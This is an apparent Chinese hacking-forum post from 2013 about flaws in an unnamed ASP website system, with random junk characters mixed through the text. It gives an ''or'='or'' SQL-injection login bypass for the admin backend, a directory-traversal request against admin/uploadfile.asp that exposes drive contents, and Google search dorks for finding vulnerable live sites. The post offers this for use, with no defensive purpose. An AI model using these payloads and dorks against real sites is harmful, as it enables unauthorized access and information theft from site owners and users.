后台万能密码 'or'='or'
) G. m$ u1 I. M4 L# h, c6 R0 I9 k% B3 z7 _8 d
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% |5 U! f- R: y6 }; |admin/uploadfile.asp?currentFolder=/upfiles/../+ H" i8 @( P1 b6 w5 A2 `
( C6 S0 s$ `, Z3 [& e漏洞证明:& o6 T/ A' G5 y: y0 ~( G
% H; r$ m+ }5 ?: J谷歌:inurl:type.asp?id=1 新闻中心2 B- t, L5 S" ]1 T# f P& Y5 s
或者 :inurl:download_ok.asp?
; Z: a( _& x/ O+ Q4 L$ k9 @/ N& {4 }3 o% q; B* ]3 o" R
|
发表于 2013-3-14 20:17:32
收藏
支持
反对